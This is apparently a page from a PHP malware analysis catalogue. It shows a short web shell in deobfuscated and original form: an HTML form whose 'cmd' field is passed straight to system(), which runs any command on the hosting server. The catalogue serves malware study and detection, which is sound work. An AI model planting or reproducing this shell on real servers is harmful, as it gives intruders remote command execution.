PHP Malware Analysis

Back to list

Tags

Title
Document
Execution
system
Input
_GET

Deobfuscated code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
    <form method="GET" name="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
        <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
        <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php 
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
</pre>

</body>

</html>


Original code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
        <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
        <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>
</pre>

</body>

</html>